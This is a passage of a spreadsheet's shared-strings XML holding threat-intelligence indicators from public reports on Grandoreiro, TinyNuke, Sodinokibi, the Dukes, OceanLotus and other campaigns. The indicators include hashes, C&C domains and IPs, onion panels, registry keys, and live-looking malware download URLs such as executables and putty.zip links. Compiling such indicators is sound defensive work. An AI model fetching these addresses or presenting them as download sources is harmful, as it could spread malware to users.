  <si>
    <t>https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/</t>
  </si>
  <si>
    <t>Grandoreiro: How engorged can an EXE get?</t>
  </si>
  <si>
    <t>Trojan</t>
  </si>
  <si>
    <t>1588706064</t>
  </si>
  <si>
    <t>40fbc932bd45feb3d2409b3a4c7029ddde881389</t>
  </si>
  <si>
    <t>Old version of Grandoreiro (2017)</t>
  </si>
  <si>
    <t>7905db9bbe2cb29519a5371b175551c6612255ef</t>
  </si>
  <si>
    <t>Grandoreiro</t>
  </si>
  <si>
    <t>bd88a809b05168d6efdba4dc149653b0e1e1e448</t>
  </si>
  <si>
    <t>1588706092</t>
  </si>
  <si>
    <t>7c2ed8b4aa65befcc229a36ce50539e9d6a70ee3</t>
  </si>
  <si>
    <t>Grandoreiro downloader</t>
  </si>
  <si>
    <t>27a434d2ef4d1d021f283bcb93c6c7e50acb8ea6</t>
  </si>
  <si>
    <t>28d58402393b6bca73ff0eac319226233181edc9</t>
  </si>
  <si>
    <t>42892df64f00f4c091e1c02f74c2bb8bad131fc5</t>
  </si>
  <si>
    <t>1588706119</t>
  </si>
  <si>
    <t>bced5d138aceada1ef11bfd22c2d6359cda183db</t>
  </si>
  <si>
    <t>Grandoreiro spam tool</t>
  </si>
  <si>
    <t>Persistence mechanism</t>
  </si>
  <si>
    <t>regkey</t>
  </si>
  <si>
    <t>HKCU\Software\%USER_NAME%</t>
  </si>
  <si>
    <t>HKCU\Software\ToolTech-RM</t>
  </si>
  <si>
    <t>user-agent</t>
  </si>
  <si>
    <t>1588706185</t>
  </si>
  <si>
    <t>h55u4u4u5uii5</t>
  </si>
  <si>
    <t>1588706220</t>
  </si>
  <si>
    <t>MDL_YEL_01.dll</t>
  </si>
  <si>
    <t>MDL_BLU_BR_02.dll</t>
  </si>
  <si>
    <t>MDL_SIC_BR_03.dll</t>
  </si>
  <si>
    <t>MDL_SANT_BR_04.dll</t>
  </si>
  <si>
    <t>MDL_ITA_BR_05.dll</t>
  </si>
  <si>
    <t>MDL_BRADA_BR_06.dll</t>
  </si>
  <si>
    <t>MDL_SICCB_BR_07.dll</t>
  </si>
  <si>
    <t>MDL_SAFRA_BR_08.dll</t>
  </si>
  <si>
    <t>MDL_ORIGI_BR_09.dll</t>
  </si>
  <si>
    <t>MDL_NORDES_BR_10.dll</t>
  </si>
  <si>
    <t>MDL_BANEST_BR_11.dll</t>
  </si>
  <si>
    <t>MDL_BANEZE_BR_12.dll</t>
  </si>
  <si>
    <t>MDL_AMAZON_BR_13.dll</t>
  </si>
  <si>
    <t>MDL_UNICRE_BR_14.dll</t>
  </si>
  <si>
    <t>MDL_BRB_BR_15.dll</t>
  </si>
  <si>
    <t>MDL_WUPDATE_BR_001.dll</t>
  </si>
  <si>
    <t>1670431345</t>
  </si>
  <si>
    <t>1670433713</t>
  </si>
  <si>
    <t>https://isc.sans.edu/diary/Mirai%20Botnet%20and%20Gafgyt%20DDoS%20Team%20Up%20Against%20SOHO%20Routers./29304</t>
  </si>
  <si>
    <t>Blog URL</t>
  </si>
  <si>
    <t>InfoSec Handlers Diary Blog - SANS Internet Storm Center</t>
  </si>
  <si>
    <t>1670431601</t>
  </si>
  <si>
    <t>d47eaac87456ac5929363eee7cffc57540f6130539967dd5cdaf0ddca04e1e94</t>
  </si>
  <si>
    <t>Main payload</t>
  </si>
  <si>
    <t>1670431612</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/d47eaac87456ac5929363eee7cffc57540f6130539967dd5cdaf0ddca04e1e94</t>
  </si>
  <si>
    <t>1670431435</t>
  </si>
  <si>
    <t>f0d12efb246fac3a93f2cab32924e202eddbe92e7d80ba8be3219f5aadf0551e</t>
  </si>
  <si>
    <t>file</t>
  </si>
  <si>
    <t>File object describing a file with meta-information</t>
  </si>
  <si>
    <t>1aaf314e-2a74-4b06-855e-dd37ff9735ca</t>
  </si>
  <si>
    <t>1670431472</t>
  </si>
  <si>
    <t>lol.sh</t>
  </si>
  <si>
    <t>1670431491</t>
  </si>
  <si>
    <t>19e9baefa16cef3bede1d8b58992fe2e3d857c4fd38a102bf06c577a25502d60</t>
  </si>
  <si>
    <t>469e1b98-f4c6-4361-8695-3ee01fff25ef</t>
  </si>
  <si>
    <t>1670431508</t>
  </si>
  <si>
    <t>xd.mips</t>
  </si>
  <si>
    <t>1670431530</t>
  </si>
  <si>
    <t>9069ff0e1c75cae1f7b2db10c244004c84791f4f81eb4c11ee53b7b07fa06f96</t>
  </si>
  <si>
    <t>205d1377-7d48-49ec-97f8-0b9ad565de36</t>
  </si>
  <si>
    <t>1670431542</t>
  </si>
  <si>
    <t>xd.arms</t>
  </si>
  <si>
    <t>1456093336</t>
  </si>
  <si>
    <t>1641637730</t>
  </si>
  <si>
    <t>http://www.pinlady.net/PluginDetect</t>
  </si>
  <si>
    <t>WitchCoven: Exploiting Web Analytics to Ensnare Victims</t>
  </si>
  <si>
    <t>1456093337</t>
  </si>
  <si>
    <t>www.pinlady.net</t>
  </si>
  <si>
    <t>1641637715</t>
  </si>
  <si>
    <t>https://panopticlick.eff.org/index.php</t>
  </si>
  <si>
    <t>1641637723</t>
  </si>
  <si>
    <t>https://panopticlick.eff.org/browser-uniqueness.pdf</t>
  </si>
  <si>
    <t>panopticlick.eff.org</t>
  </si>
  <si>
    <t>1456093341</t>
  </si>
  <si>
    <t>http://flashcritic.com/state-report-reveal-130-websites-used-travel</t>
  </si>
  <si>
    <t>1456093342</t>
  </si>
  <si>
    <t>flashcritic.com</t>
  </si>
  <si>
    <t>1456093344</t>
  </si>
  <si>
    <t>634438a50ae1990c4f8636801c410460</t>
  </si>
  <si>
    <t>1550731539</t>
  </si>
  <si>
    <t>1550731573</t>
  </si>
  <si>
    <t>6950efbd9d6d10fdd8f644a71b30e53a8d1dbd64976279d8a192a0c9459d06e1</t>
  </si>
  <si>
    <t>More Russian language malspam pushing Shade (Troldesh) ransomware</t>
  </si>
  <si>
    <t>e76b93f6ab032e16f5f1d600cb061db49a10538b10a063561df95be94156ac0b</t>
  </si>
  <si>
    <t>http://simplerlife.pl/wp-content/themes/hueman/assets/admin/css/pic.zip</t>
  </si>
  <si>
    <t>17539e1a0c33fe2f98fa1b8fa282f9f3786ba15419e30ae6c4171ccff65338c9</t>
  </si>
  <si>
    <t>33dde2eed8ccb2b74c9d0feaf19c341354e54cb5d2c9e475507ff3fe22240381</t>
  </si>
  <si>
    <t>http://sidneyyin.com/templates/joomlage0084-aravnik/css/msg.jpg</t>
  </si>
  <si>
    <t>62.212.69.227</t>
  </si>
  <si>
    <t>74.220.207.61</t>
  </si>
  <si>
    <t>email-dst</t>
  </si>
  <si>
    <t>pilotpilot088@gmail.com</t>
  </si>
  <si>
    <t>http://cryptsen7fo43rr6.onion/</t>
  </si>
  <si>
    <t>http://cryptsen7fo43rr6.onion.to/</t>
  </si>
  <si>
    <t>http://cryptsen7fo43rr6.onion.cab/</t>
  </si>
  <si>
    <t>1550731566</t>
  </si>
  <si>
    <t>https://isc.sans.edu/forums/diary/More+Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24668/</t>
  </si>
  <si>
    <t>1456266625</t>
  </si>
  <si>
    <t>1650656466</t>
  </si>
  <si>
    <t>b9208a5b0504cb2283b1144fc455eaaa</t>
  </si>
  <si>
    <t>LOWBOW - FireEye</t>
  </si>
  <si>
    <t>1456266626</t>
  </si>
  <si>
    <t>ec19ed7cddf92984906325da59f75351</t>
  </si>
  <si>
    <t>1456266627</t>
  </si>
  <si>
    <t>6495b384748188188d09e9d5a0c401a4</t>
  </si>
  <si>
    <t>1456266628</t>
  </si>
  <si>
    <t>d76261ba3b624933a6ebb5dd73758db4</t>
  </si>
  <si>
    <t>1456266629</t>
  </si>
  <si>
    <t>79b68cdd0044edd4fbf8067b22878644</t>
  </si>
  <si>
    <t>1456266630</t>
  </si>
  <si>
    <t>59.188.0.197</t>
  </si>
  <si>
    <t>1456266631</t>
  </si>
  <si>
    <t>accounts.serveftp.com</t>
  </si>
  <si>
    <t>1456266632</t>
  </si>
  <si>
    <t>0beb957923df2c885d29a9c1743dd94b</t>
  </si>
  <si>
    <t>1481291126</t>
  </si>
  <si>
    <t>http://www.scmp.com/news/hong</t>
  </si>
  <si>
    <t>http://www.ejinsight.com/20150831Â­hkuÂ­concernÂ­groupÂ­raisesÂ­proxyÂ­fearsÂ­inÂ­keyÂ­vote</t>
  </si>
  <si>
    <t>1650656439</t>
  </si>
  <si>
    <t>www.scmp.com</t>
  </si>
  <si>
    <t>legitimate website</t>
  </si>
  <si>
    <t>1481291162</t>
  </si>
  <si>
    <t>www.ejinsight.com</t>
  </si>
  <si>
    <t>1481291110</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html</t>
  </si>
  <si>
    <t>1642623024</t>
  </si>
  <si>
    <t>1642623382</t>
  </si>
  <si>
    <t>Facture-78224UDJ2021.js</t>
  </si>
  <si>
    <t>TinyNuke Banking Malware Targets French Entities</t>
  </si>
  <si>
    <t>1642623267</t>
  </si>
  <si>
    <t>%APPDATA%\E02BC647BACE72A1\tor.exe</t>
  </si>
  <si>
    <t>1642623263</t>
  </si>
  <si>
    <t>%APPDATA%\E02BC647BACE72A1\firefox.exe</t>
  </si>
  <si>
    <t>1642623255</t>
  </si>
  <si>
    <t>%APPDATA%\putty.exe</t>
  </si>
  <si>
    <t>1642623082</t>
  </si>
  <si>
    <t>fizi4aqe7hpsts3r.onion/hci/client.php</t>
  </si>
  <si>
    <t>1642623098</t>
  </si>
  <si>
    <t>HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x00E02BC647BACE72A1\xe4\x8d\x82</t>
  </si>
  <si>
    <t>1642623153</t>
  </si>
  <si>
    <t>https://www.genou-alsace.fr/putty.zip</t>
  </si>
  <si>
    <t>1642623162</t>
  </si>
  <si>
    <t>https://addendasoftware.com/blog2/wp-content/uploads/2021/11/putty.zip</t>
  </si>
  <si>
    <t>1642623168</t>
  </si>
  <si>
    <t>http://www.energym63.com/10451372/putty2.zip</t>
  </si>
  <si>
    <t>1642623172</t>
  </si>
  <si>
    <t>http://laurentabert.fr/setup.zip</t>
  </si>
  <si>
    <t>1642623176</t>
  </si>
  <si>
    <t>http://www.energym63.com/10451372/cports.exe</t>
  </si>
  <si>
    <t>1642623180</t>
  </si>
  <si>
    <t>http://www.palette-events.com/css/\_notes/putty.zip</t>
  </si>
  <si>
    <t>1642623188</t>
  </si>
  <si>
    <t>5ba482a11f1a99293a249c350c360cd0d8f1456dfcfd27bf0b4189511e4800d8</t>
  </si>
  <si>
    <t>1642623195</t>
  </si>
  <si>
    <t>https://baloobajojonako.fr/panel/client.php?47F3640E5BCAD613</t>
  </si>
  <si>
    <t>1642623201</t>
  </si>
  <si>
    <t>http://www.lightcharts.com/old-website/putty.zip</t>
  </si>
  <si>
    <t>1642623209</t>
  </si>
  <si>
    <t>https://www.edmf.org/redirect\_d2CORIvmZ/putty.zip</t>
  </si>
  <si>
    <t>1642623291</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/blog/threat-insight/tinynuke-banking-malware-targets-french-entities</t>
  </si>
  <si>
    <t>https://lft.orange.fr/spaces/download/</t>
  </si>
  <si>
    <t>1570460074</t>
  </si>
  <si>
    <t>1571855044</t>
  </si>
  <si>
    <t>4ba559c403ff3f5cc2571ae0961eaff6cf0a50f6</t>
  </si>
  <si>
    <t>PolyglotDuke</t>
  </si>
  <si>
    <t>Operation Ghost - White Paper</t>
  </si>
  <si>
    <t>ESET</t>
  </si>
  <si>
    <t>cf14ac569a63df214128f375c12d90e535770395</t>
  </si>
  <si>
    <t>539d021cd17d901539a5e1132ecaab7164ed5db5</t>
  </si>
  <si>
    <t>0e25ee58b119dd48b7c9931879294ac3fc433f50</t>
  </si>
  <si>
    <t>d625c7ce9dc7e56a29ec9a81650280edc6189616</t>
  </si>
  <si>
    <t>1570460097</t>
  </si>
  <si>
    <t>0a5a7dd4ad0f2e50f3577f8d43a4c55ddc1d80cf</t>
  </si>
  <si>
    <t>RegDuke loader</t>
  </si>
  <si>
    <t>f7fd63c0534d2f717fd5325d4397597c9ee4065f</t>
  </si>
  <si>
    <t>194d8e2ae4c723ce5fe11c4d9cfefbba32dcf766</t>
  </si>
  <si>
    <t>64d6c11fff2c2aadaacee01b294afcc751316176</t>
  </si>
  <si>
    <t>6acc0b1230303f8cf46152697d3036d69ea5a849</t>
  </si>
  <si>
    <t>170be45669026f3c1fc5ba2d48817dbf950da3f6</t>
  </si>
  <si>
    <t>1570460111</t>
  </si>
  <si>
    <t>5905c55189c683bc37258aec28e916c41948cd1c</t>
  </si>
  <si>
    <t>RegDuke backdoor</t>
  </si>
  <si>
    <t>1570460132</t>
  </si>
  <si>
    <t>b05caba461000c6ebd8b237f318577e9bccd6047</t>
  </si>
  <si>
    <t>MiniDuke</t>
  </si>
  <si>
    <t>718c2ce6170d6ca505297b41de072d8d3b873456</t>
  </si>
  <si>
    <t>1570460150</t>
  </si>
  <si>
    <t>a88da2dd033775f7abc8d6fb3ad5dd48efbeade1</t>
  </si>
  <si>
    <t>FatDuke</t>
  </si>
  <si>
    <t>db19171b239ef6de8e83b2926eadc652e74a5afa</t>
  </si>
  <si>
    <t>1570460165</t>
  </si>
  <si>
    <t>9e96b00e9f7eb94a944269108b9e02d97142eedc</t>
  </si>
  <si>
    <t>FatDuke Loader</t>
  </si>
  <si>
    <t>1570460178</t>
  </si>
  <si>
    <t>af2b46d4371ce632e2669fea1959ee8af4ec39ce</t>
  </si>
  <si>
    <t>LiteDuke</t>
  </si>
  <si>
    <t>Antivirus detection</t>
  </si>
  <si>
    <t>text</t>
  </si>
  <si>
    <t>1570460262</t>
  </si>
  <si>
    <t>Win32/Agent.ZWH</t>
  </si>
  <si>
    <t>Win32/Agent.AAPY</t>
  </si>
  <si>
    <t>Win64/Agent.OL</t>
  </si>
  <si>
    <t>MSIL/Tiny.BG</t>
  </si>
  <si>
    <t>MSIL/Agent.TGC</t>
  </si>
  <si>
    <t>MSIL/Agent.SVP</t>
  </si>
  <si>
    <t>MSIL/Agent.SXO</t>
  </si>
  <si>
    <t>MSIL/Agent.SYC</t>
  </si>
  <si>
    <t>MSIL/Agent.CAW</t>
  </si>
  <si>
    <t>Win32/Agent.TSG</t>
  </si>
  <si>
    <t>Win32/Agent.TUF</t>
  </si>
  <si>
    <t>Win32/Agent.TSH</t>
  </si>
  <si>
    <t>Win32/Agent.AART</t>
  </si>
  <si>
    <t>1570460288</t>
  </si>
  <si>
    <t>http://ibb.co/hVhaAq</t>
  </si>
  <si>
    <t>Public webpage used by PolyglotDuke</t>
  </si>
  <si>
    <t>http://imgur.com/1RzfF7r</t>
  </si>
  <si>
    <t>http://imgur.com/6wjspWp</t>
  </si>
  <si>
    <t>http://imgur.com/d4ObKL0</t>
  </si>
  <si>
    <t>http://imgur.com/D6U06Ci</t>
  </si>
  <si>
    <t>http://imgur.com/GZSK9zI</t>
  </si>
  <si>
    <t>http://imgur.com/wcMk7a2</t>
  </si>
  <si>
    <t>http://imgur.com/WMTwSMJ</t>
  </si>
  <si>
    <t>http://imgur.com/WOKHonk</t>
  </si>
  <si>
    <t>http://imgur.com/XFa7Ee1</t>
  </si>
  <si>
    <t>http://jack998899jack.imgbb.com</t>
  </si>
  <si>
    <t>http://simp.ly/publish/pBn8Jt</t>
  </si>
  <si>
    <t>http://thinkery.me/billywilliams/5a0170161cb602262f000d2c</t>
  </si>
  <si>
    <t>http://twitter.com/aimeefleming25</t>
  </si>
  <si>
    <t>http://twitter.com/hen_rivero</t>
  </si>
  <si>
    <t>http://twitter.com/JamesScott1990</t>
  </si>
  <si>
    <t>http://twitter.com/KarimM_traveler</t>
  </si>
  <si>
    <t>http://twitter.com/lerg5pvo1i</t>
  </si>
  <si>
    <t>http://twitter.com/m63vhd7ach3</t>
  </si>
  <si>
    <t>http://twitter.com/MarlinTarin</t>
  </si>
  <si>
    <t>http://twitter.com/np8j7ovqdl</t>
  </si>
  <si>
    <t>http://twitter.com/q5euqysfu5</t>
  </si>
  <si>
    <t>http://twitter.com/qistp743li</t>
  </si>
  <si>
    <t>http://twitter.com/t8t842io2</t>
  </si>
  <si>
    <t>http://twitter.com/ua6ivyxkfv</t>
  </si>
  <si>
    <t>http://twitter.com/utyi5asko02</t>
  </si>
  <si>
    <t>http://twitter.com/vgmmmyqaq</t>
  </si>
  <si>
    <t>http://twitter.com/vvwc63tgz</t>
  </si>
  <si>
    <t>http://twitter.com/wekcddkg2ra</t>
  </si>
  <si>
    <t>http://twitter.com/xzg3a2e2z</t>
  </si>
  <si>
    <t>1571218510</t>
  </si>
  <si>
    <t>http://www.evernote.com/shard/s675/sh/6686ff4e-8896-499b-8cdb-a2bbf2cc4db9/fc7fbe66c820f17c30147235e95d31b8</t>
  </si>
  <si>
    <t>http://www.fotolog.com/g1h4wuiz6</t>
  </si>
  <si>
    <t>http://www.fotolog.com/gf3z425rr0</t>
  </si>
  <si>
    <t>http://www.fotolog.com/i4ntff47xfw</t>
  </si>
  <si>
    <t>http://www.fotolog.com/joannevil/121000000000030009/</t>
  </si>
  <si>
    <t>http://www.fotolog.com/o2rh2s2x7pu</t>
  </si>
  <si>
    <t>http://www.fotolog.com/q4tusizx9xb</t>
  </si>
  <si>
    <t>http://www.fotolog.com/rypnil03sl6</t>
  </si>
  <si>
    <t>http://www.fotolog.com/shx8hypubt</t>
  </si>
  <si>
    <t>http://www.fotolog.com/u99aliw5g</t>
  </si>
  <si>
    <t>http://www.fotolog.com/uq44y4j19m8</t>
  </si>
  <si>
    <t>http://www.fotolog.com/vq21p34</t>
  </si>
  <si>
    <t>http://www.fotolog.com/vz1g3wmwu</t>
  </si>
  <si>
    <t>http://www.fotolog.com/zu2of5vyfl6</t>
  </si>
  <si>
    <t>http://www.google.com/?gws_rd=ssl#q=Heiofjskghwe+Hjwefkbqw</t>
  </si>
  <si>
    <t>http://www.kiwibox.com/AfricanRugby/info/</t>
  </si>
  <si>
    <t>http://www.kiwibox.com/GaryPhotographe/info/</t>
  </si>
  <si>
    <t>http://www.reddit.com/user/BeaumontV/</t>
  </si>
  <si>
    <t>http://www.reddit.com/user/StevensThomasWis/</t>
  </si>
  <si>
    <t>1570460313</t>
  </si>
  <si>
    <t>acciaio.com.br</t>
  </si>
  <si>
    <t>PolyglotDuke C&amp;C</t>
  </si>
  <si>
    <t>ceycarb.com</t>
  </si>
  <si>
    <t>coachandcook.at</t>
  </si>
  <si>
    <t>fisioterapiabb.it</t>
  </si>
  <si>
    <t>lorriratzlaff.com</t>
  </si>
  <si>
    <t>mavin21c.dothome.co.kr</t>
  </si>
  <si>
    <t>motherlodebulldogclub.com</t>
  </si>
  <si>
    <t>powerpolymerindustry.com</t>
  </si>
  <si>
    <t>publiccouncil.org</t>
  </si>
  <si>
    <t>rulourialuminiu.co.uk</t>
  </si>
  <si>
    <t>sistemikan.com</t>
  </si>
  <si>
    <t>varuhusmc.org</t>
  </si>
  <si>
    <t>1570460339</t>
  </si>
  <si>
    <t>ecolesndmessines.org</t>
  </si>
  <si>
    <t>MiniDuke C&amp;C</t>
  </si>
  <si>
    <t>salesappliances.com</t>
  </si>
  <si>
    <t>1570460356</t>
  </si>
  <si>
    <t>busseylawoffice.com</t>
  </si>
  <si>
    <t>FatDuke C&amp;C</t>
  </si>
  <si>
    <t>fairfieldsch.org</t>
  </si>
  <si>
    <t>ministernetwork.org</t>
  </si>
  <si>
    <t>skagenyoga.com</t>
  </si>
  <si>
    <t>westmedicalgroup.net</t>
  </si>
  <si>
    <t>1570460370</t>
  </si>
  <si>
    <t>bandabonga.fr</t>
  </si>
  <si>
    <t>LiteDuke C&amp;C</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf</t>
  </si>
  <si>
    <t>Research White Paper</t>
  </si>
  <si>
    <t>1542652439</t>
  </si>
  <si>
    <t>1543142009</t>
  </si>
  <si>
    <t>baotgm.net</t>
  </si>
  <si>
    <t>Compromised website</t>
  </si>
  <si>
    <t>OceanLotus - WateringHole - Framework B 2018</t>
  </si>
  <si>
    <t>cnrp7.org</t>
  </si>
  <si>
    <t>conggiaovietnam.net</t>
  </si>
  <si>
    <t>daichungvienvinhthanh.com</t>
  </si>
  <si>
    <t>danchimviet.info</t>
  </si>
  <si>
    <t>danviet.vn</t>
  </si>
  <si>
    <t>danviethouston.com</t>
  </si>
  <si>
    <t>fvpoc.org</t>
  </si>
  <si>
    <t>gardencityclub.com</t>
  </si>
  <si>
    <t>lienketqnhn.org</t>
  </si>
  <si>
    <t>mfaic.gov.kh</t>
  </si>
  <si>
    <t>mod.gov.kh</t>
  </si>
  <si>
    <t>mtgvinh.net</t>
  </si>
  <si>
    <t>nguoitieudung.com.vn</t>
  </si>
  <si>
    <t>phnompenhpost.com</t>
  </si>
  <si>
    <t>raovatcalitoday.com</t>
  </si>
  <si>
    <t>thongtinchongphandong.com</t>
  </si>
  <si>
    <t>tinkhongle.com</t>
  </si>
  <si>
    <t>toithichdoc.blogspot.com</t>
  </si>
  <si>
    <t>trieudaiviet.com</t>
  </si>
  <si>
    <t>triviet.news</t>
  </si>
  <si>
    <t>domain|ip</t>
  </si>
  <si>
    <t>1542652482</t>
  </si>
  <si>
    <t>arabica.podzone.net|178.128.103.24</t>
  </si>
  <si>
    <t>1st stage</t>
  </si>
  <si>
    <t>utagscript.com|206.189.88.50</t>
  </si>
  <si>
    <t>lcontacts.servebbs.net|178.128.219.207</t>
  </si>
  <si>
    <t>sskimresources.com|178.128.90.102</t>
  </si>
  <si>
    <t>wfpscripts.homeunix.com|178.128.223.102</t>
  </si>
  <si>
    <t>cdnscr.thruhere.net|178.128.98.139</t>
  </si>
  <si>
    <t>your-ip.getmyip.com|178.128.103.74</t>
  </si>
  <si>
    <t>gui.dnsdojo.net|178.128.28.93</t>
  </si>
  <si>
    <t>figbc.knowsitall.info|178.128.103.207</t>
  </si>
  <si>
    <t>tips-renew.webhop.info|159.65.7.45</t>
  </si>
  <si>
    <t>tcog.thruhere.net|178.128.107.83</t>
  </si>
  <si>
    <t>s0-2mdn.net|104.248.144.178</t>
  </si>
  <si>
    <t>static.tagscdn.com|206.189.95.214</t>
  </si>
  <si>
    <t>metacachecdn.com|178.128.209.153</t>
  </si>
  <si>
    <t>s-adroll.com|128.199.159.127</t>
  </si>
  <si>
    <t>tiwimg.com|206.189.89.121</t>
  </si>
  <si>
    <t>widgets-wp.com|178.128.90.107</t>
  </si>
  <si>
    <t>lb-web-stat.com|159.65.128.57</t>
  </si>
  <si>
    <t>cdn1.shacknet.us|142.93.127.120</t>
  </si>
  <si>
    <t>assets-cdn.blogdns.net|178.128.28.89</t>
  </si>
  <si>
    <t>html5.endofinternet.net|178.128.90.182</t>
  </si>
  <si>
    <t>ds-aksb-a.likescandy.com|159.65.137.144</t>
  </si>
  <si>
    <t>nav.neat-url.com|142.93.116.157</t>
  </si>
  <si>
    <t>pixel1.dnsalias.net|142.93.116.157</t>
  </si>
  <si>
    <t>trc.webhop.net|178.128.90.223</t>
  </si>
  <si>
    <t>1542652530</t>
  </si>
  <si>
    <t>10cm.mypets.ws|178.128.100.189</t>
  </si>
  <si>
    <t>2nd stage</t>
  </si>
  <si>
    <t>optnmstri.com|159.65.134.146</t>
  </si>
  <si>
    <t>imgincapsula.com|209.97.164.158</t>
  </si>
  <si>
    <t>secure-imrworldwide.com|178.128.90.109</t>
  </si>
  <si>
    <t>cdn-ampproject.com|178.128.24.201</t>
  </si>
  <si>
    <t>io.blogsite.org|178.128.98.89</t>
  </si>
  <si>
    <t>cdnazure.com|209.97.164.96</t>
  </si>
  <si>
    <t>ichefbcci.is-a-chef.com|206.189.85.162</t>
  </si>
  <si>
    <t>cyhire.cechire.com|178.128.103.79</t>
  </si>
  <si>
    <t>weblink.selfip.info|178.128.103.202</t>
  </si>
  <si>
    <t>p-typekit.com|104.248.144.136</t>
  </si>
  <si>
    <t>pagefairjs.com|159.65.137.109</t>
  </si>
  <si>
    <t>bootstraplink.com|159.65.129.241</t>
  </si>
  <si>
    <t>player-cnevids.com|128.199.159.60</t>
  </si>
  <si>
    <t>tiqqcdn.com|206.189.47.116</t>
  </si>
  <si>
    <t>cdn-tynt.com|142.93.75.192</t>
  </si>
  <si>
    <t>benchtag2.com|178.128.90.108</t>
  </si>
  <si>
    <t>scdn-cxense.com|142.93.75.161</t>
  </si>
  <si>
    <t>cart.gotdns.com|206.189.145.242</t>
  </si>
  <si>
    <t>effecto-azureedge.net|142.93.71.92</t>
  </si>
  <si>
    <t>labs-apnic.net|178.128.90.138</t>
  </si>
  <si>
    <t>straits-times.is-an-actor.com|178.128.90.66</t>
  </si>
  <si>
    <t>ad-appier.com|178.128.90.66</t>
  </si>
  <si>
    <t>static-addtoany.com|142.93.75.172</t>
  </si>
  <si>
    <t>1542652580</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2018/11/20/oceanlotus-new-watering-hole-attack-southeast-asia/</t>
  </si>
  <si>
    <t>1542654188</t>
  </si>
  <si>
    <t>JS/Agent.NYQ</t>
  </si>
  <si>
    <t>JS/Agent.NYR</t>
  </si>
  <si>
    <t>1542654206</t>
  </si>
  <si>
    <t>2194271c7991d60ae82436129d7f25c0a689050a</t>
  </si>
  <si>
    <t>1st stage script</t>
  </si>
  <si>
    <t>1542654224</t>
  </si>
  <si>
    <t>996d0ac930d2cdb16ef96edc27d9d1afc2d89ca8</t>
  </si>
  <si>
    <t>2nd stage script</t>
  </si>
  <si>
    <t>1556779363</t>
  </si>
  <si>
    <t>1556779387</t>
  </si>
  <si>
    <t>0fa207940ea53e2b54a2b769d8ab033a6b2c5e08c78bf4d7dade79849960b54d</t>
  </si>
  <si>
    <t>Ransomware samples</t>
  </si>
  <si>
    <t>Sodinokibi ransomware exploits WebLogic Server vulnerability</t>
  </si>
  <si>
    <t>34dffdb04ca07b014cdaee857690f86e490050335291ccc84c94994fa91e0160</t>
  </si>
  <si>
    <t>74bc2f9a81ad2cc609b7730dbabb146506f58244e5e655cbb42044913384a6ac</t>
  </si>
  <si>
    <t>95ac3903127b74f8e4d73d987f5e3736f5bdd909ba756260e187b6bf53fb1a05</t>
  </si>
  <si>
    <t>fa2bccdb9db2583c2f9ff6a536e824f4311c9a8a9842505a0323f027b8b51451</t>
  </si>
  <si>
    <t>http://188.166.74.218/office.exe</t>
  </si>
  <si>
    <t>Distribution URL</t>
  </si>
  <si>
    <t>http://188.166.74.218/radm.exe</t>
  </si>
  <si>
    <t>http://188.166.74.218/untitled.exe</t>
  </si>
  <si>
    <t>http://45.55.211.79/.cache/untitled.exe</t>
  </si>
  <si>
    <t>130.61.54.136</t>
  </si>
  <si>
    <t>Attacker IP</t>
  </si>
  <si>
    <t>decryptor.top</t>
  </si>
  <si>
    <t>Attacker Domain</t>
  </si>
  <si>
    <t>1556779380</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html</t>
  </si>
  <si>
    <t>1466510527</t>
  </si>
  <si>
    <t>https://www.secureworks.com/blog/malware-lingers-with-bits</t>
  </si>
  <si>
    <t>Windows Background Intelligent Transfer Service (BITS) used to download malware</t>
  </si>
  <si>
    <t>1465580105</t>
  </si>
  <si>
    <t>big4u.org</t>
  </si>
  <si>
    <t>bootfun.info</t>
  </si>
  <si>
    <t>deris.info</t>
  </si>
  <si>
    <t>fasilmy.info</t>
  </si>
  <si>
    <t>heato.info</t>
  </si>
  <si>
    <t>legco.info</t>
  </si>
  <si>
    <t>likerut.info</t>
  </si>
  <si>
    <t>listcool.info</t>
  </si>
  <si>
    <t>monoset.info</t>
  </si>
  <si>
    <t>moonas.info</t>
  </si>
  <si>
    <t>ough.info</t>
  </si>
  <si>
    <t>paneljob.info</t>
  </si>
  <si>
    <t>realget.info</t>
  </si>
  <si>
    <t>safesuns.info</t>
  </si>
  <si>
    <t>sportnew.net</t>
  </si>
  <si>
    <t>theget.biz</t>
  </si>
  <si>
    <t>ukjobmy.com</t>
  </si>
  <si>
    <t>usafun.info</t>
  </si>
  <si>
    <t>yelts.net</t>
  </si>
  <si>
    <t>1662989258</t>
  </si>
  <si>
    <t>1662991683</t>
  </si>
  <si>
    <t>The Curious Case of “Monti” Ransomware: A Real-World Doppelganger BlackBerry Logo</t>
  </si>
  <si>
    <t>Blog title</t>
  </si>
  <si>
    <t>https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger</t>
  </si>
  <si>
    <t>1662991518</t>
  </si>
  <si>
    <t>https://twitter.com/malwrhunterteam/status/1542595315915710465?s=20&amp;t=Y7d3POTgnMSB\_JcyEeF5\_g</t>
  </si>
  <si>
    <t>1662991247</t>
  </si>
  <si>
    <t>https://yoroi.company/research/conti-ransomware-source-code-a-well-designed-cots-ransomware/</t>
  </si>
  <si>
    <t>1662990930</t>
  </si>
  <si>
    <t>b45fe91d2e2340939781d39daf606622e6d0b9ddacd8425cb8e49c56124c1d56</t>
  </si>
  <si>
    <t>samples that reference MONTI</t>
  </si>
  <si>
    <t>1662989259</t>
  </si>
  <si>
    <t>78517fb07ee5292da627c234b26b555413a459f8d7a9641e4a9fcc1099f06a3d</t>
  </si>
  <si>
    <t>df492b4cc7f644ad3e795155926d1fc8ece7327c0c5c8ea45561f24f5110ce54</t>
  </si>
  <si>
    <t>1662990942</t>
  </si>
  <si>
    <t>702099b63cb2384e11f088d6bc33afbd43a4c91848f393581242a6a17f1b30a0</t>
  </si>
  <si>
    <t>1662990937</t>
  </si>
  <si>
